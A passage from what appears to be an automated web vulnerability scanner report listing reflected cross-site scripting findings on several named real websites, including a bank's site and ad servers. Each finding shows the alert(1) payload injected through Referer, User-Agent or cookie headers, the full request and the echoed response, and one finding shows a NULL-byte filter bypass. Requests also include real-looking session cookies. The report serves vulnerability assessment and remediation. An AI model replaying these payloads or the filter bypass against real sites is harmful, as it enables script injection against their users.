Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=2399d';alert(1)//1fd21ed3d2');
});


</script>
...[SNIP]...

1.688. http://www.experts123.com/questions/ask [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/ask

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/ask HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 16:35:53 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:53 GMT
Connection: close
Content-Length: 11928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=95b18';alert(1)//6e16c45e18f');
});


</script>
...[SNIP]...

1.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/filter/bank

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/filter/bank HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:54 GMT
Connection: close
Content-Length: 49014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=93a1d';alert(1)//1261bf759ea');
});


</script>
...[SNIP]...

1.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:14:04 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20813


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: %00ba07d"-alert(1)-"85da7928a00
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24677


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="%00ba07d"-alert(1)-"85da7928a00";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

1.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

var remote_add = "REMOTE_ADDR=173.193.214.243";
var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80";
var datServ = 'http://ugc-int.superpages.com';
var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/";
var imServ = 'http://media.superpages.com/media/photos/';
var lidforpageload = '2118
...[SNIP]...

1.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:17 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:17 GMT
Vary: User-Agent,Cookie
Content-Length: 5930
Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r"+expires+"; path=/";


               window.location="http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc"
</script>
...[SNIP]...

1.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Date: Thu, 03 Feb 2011 18:54:52 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db&_segment=2%7CgFEcJzqCjXJj59a51'-alert(1)-'a6f6442db%7C"/>
...[SNIP]...

1.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2536

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

